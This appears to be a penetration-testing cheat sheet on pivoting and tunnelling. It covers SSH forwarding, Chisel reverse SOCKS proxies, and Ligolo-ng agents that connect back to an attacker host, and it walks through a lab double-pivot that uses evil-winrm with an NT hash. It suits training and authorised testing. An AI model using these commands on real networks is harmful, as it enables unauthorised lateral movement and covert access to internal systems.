Port forwarding and tunneling are techniques used to forward network traffic from one host to another. This can be useful for bypassing firewalls, accessing services on a remote network, or creating a secure connection between two hosts.

SSH port forwarding

# Host machine
ssh -L 8080:localhost:80 user@remote_host

Port forwarding with Chisel

# Host machine
sudo chisel server --reverse -v -p 1234 --socks5
 
# Target machine (Windows)
.\chisel.exe client -v 10.10.16.11:1234 R:socks
 
# Target machine (Linux)
./chisel client -v 10.10.16.11:1234 R:socks

Tunneling with Ligolo-ng

This is the preferred method for tunneling, as it allows for more advanced configurations and is easier to set up. All you need is upload the agent to the target machine and run the proxy on the host machine. The agent will create a reverse tunnel to the host machine, allowing you to access services on the target machine as if they were running locally.

Info

I found the ligolo-ng available on Kali Linux is not well maintained, I had several issues with it. I recommend using the version from the GitHub repository.

The quick method

# Host machine
sudo ./proxy -selfcert
 
# Target machine
./agent -connect <host>:11601 -ignore-cert
 
# After establishing the connection (on host machine):
session
autoroute

The proper method

Set up Ligolo-ng on Kali:

# Create an interface
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
 
# Add new IP range we want to access (Examine Pivot Host with ifconfig, ip a, etc commands)
sudo ip route add 172.16.8.0/24 dev ligolo
ip route list
 
# Run the proxy file
sudo chmod +x proxy
./proxy -selfcert
 
# The Ligolo-ng console will now open (We will interact with it soon)

On the Pivot target, use the agent file to connect to our running proxy:

# On Linux
chmod +x agent
./agent --connect <kali_ip>:11601 -ignore-cert
 
# On Windows PowerShell
./agent.exe --connect <kali_ip>:11601 -ignore-cert

Now enter the following on the Ligolo-ng console:

# Enter "session" to show the available sessions
ligolo-ng » session
 
# Enter "1" to select the session we created when using the agent
? Specify a session : 1
 
 
# Enter "start" to start the connection
[Agent : root@dmz01] » start
[Agent : root@dmz01] » INFO[0045] Starting tunnel to root@dmz01
 
# Now we are able to access the network 172.16.8.0/24

Double pivoting to access 2nd internal network

The following situation is given:

  • We got access to the first internal network (172.16.8.0/24) through Administrator access at Pivot Host A (172.16.8.120).
  • The Host B as access to another internal network (172.16.9.0/24).
  • We will set a Second Pivot at Host B (172.16.8.3) to access the second internal network (172.16.9.0/24).

Check the graph below to have a better understanding of the situation:

To achieve that, we can do the following:

# Connect with evil-winrm
evil-winrm -i 172.16.8.3 -u Administrator -H <NT_hash>
 
# Upload ligolo-ng agent.exe
upload agent.exe
 
# Set up a new ligolo interface on Kali
sudo ip tuntap add user $USER mode tun ligolo2
sudo ip link set ligolo2 up
 
# Add the second internal network
sudo ip route add 172.16.9.0/24 dev ligolo2
 
# On the Ligolo-ng current session, create a new listener connecting to the Port 11601 of the first session
listener_add --addr 0.0.0.0:11601 --to 0.0.0.0:11601
 
# Run the agent.exe to create a connection from the Second Pivot Host to the First Pivot Host
./agent.exe --connect 172.16.8.120:11601 -ignore-cert
 
# On Ligolo-ng console - Show sessions
ligolo-ng » session
 
# Select the new session created from the Second Pivot Host
? Specify a session : 2
 
# Start new Ligolo-ng session using the new interface "ligolo2" so it won't interfere with the first interface "ligolo"
[Agent : INLANEFREIGHT\Administrator@DC01] » start --tun ligolo2
[Agent : INLANEFREIGHT\Administrator@DC01] » INFO[0289] Starting tunnel to INLANEFREIGHT\Administrator@DC01
 
# Now we can access the second internal network 172.16.9.0/24